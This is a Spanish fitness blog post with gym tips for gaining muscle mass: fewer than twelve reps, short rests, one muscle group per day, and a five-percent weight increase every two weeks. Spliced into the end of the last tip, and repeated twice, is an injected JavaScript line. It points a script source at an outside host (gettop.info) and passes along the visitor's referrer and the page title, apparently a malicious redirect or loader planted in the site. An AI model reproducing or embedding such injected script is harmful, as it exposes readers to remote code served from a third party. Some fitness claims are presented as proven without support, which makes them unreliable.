Salud y belleza » Deportes

Gimnasio: recomendaciones para ganar masa muscular

Sin Comentarios

Cuando se trata de ejercicio, puede que existan manuales de capacitación mas no una biblia. Sucede que, constantemente, de acuerdo a diferentes estudios, nuevos consejos y diferentes recomendaciones se agregan o se desechan en esa búsqueda por optimizar el rendimiento de un deportista en su escapada al gimnasio.

Así, algunas corrientes sostienen determinadas ideas y otros estudiosos de la alterofilia y el ejercicio de alto nivel optan por técnicas diversas.

Lo que proponemos desde este espacio es un compendio de consejos fáciles, de recomendaciones universales (o lo más cercano a eso) para quienes se hallan a la búsqueda de incrementar su nivel de masa muscular.
Conceptos firmes para, naturalmente, conseguir músculos de similar condición…

  • No efectuar más de doce repeticiones por ejercicio (solo pesas)

Realizar más de doce repeticiones en cada secuencia de ejercicios puede resultar poco provechoso: el cuerpo se cansa pero los músculos no se llevan hacia el extremo ni se explota toda su capacidad (al hacer tantas repeticiones con pesas las fibras musculares producen contracción y tienen menos oportunidad de desarrollar músculo). Es mejor optar por un nivel de peso superior y realizar menos ejercicios pues de esta manera se está trabajando de forma más intensta aunque no lo parezca: recuerda siempre que el número de kilos es más importante que el de repeticiones.

  • Reducir los tiempos de descanso, mantener el cuerpo en actividad (no aeróbico)

Si bien es completamente necesario descansar de forma adecuada el cuerpo al terminar un ejercicio, la exageración de ese concepto puede ser perjudicial para la rutina de trabajo. Las pesas son una forma de no darle tregua al cuerpo pues, guste o no, los músculos deben soportar presión para crecer y si entre cada serie de repeticiones descansamos demasiado tiempo no lograremos ese efecto (cansancio necesario). El equilibro es la clave: descanso sí, haraganería no.

  • Adecuar la rutina de ejercicios a razón de un grupo muscular por día

Un día típico de gimnasio no significa “hacer de todo un poco” sino hacer “todo de un poco”. Lo que queremos decir es que las rutinas no deben mezclar ejercicios de zonas diferentes. Se debe planificar el trabajo a razón de un grupo muscular por día: abdominales, brazos, piernas, espalda, pecho o como se lo prefiera pero sin contrastes excesivos.

  • Aumentar el valor de cada pesa un cinco por ciento cada quince días

Es indispensable llevar un detallado registro sobre el peso que se utiliza. De otra manera, no se puede calcular el progreso de forma certera. Y, por otra parte, con respecto al aumento de los kilos de cada pesa, una pregunta siempre frecuente: bien, está comprobado que subiendo el valor de cada pesa un cinco por ciento a razón de cada dos semanas es sumamente útil.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.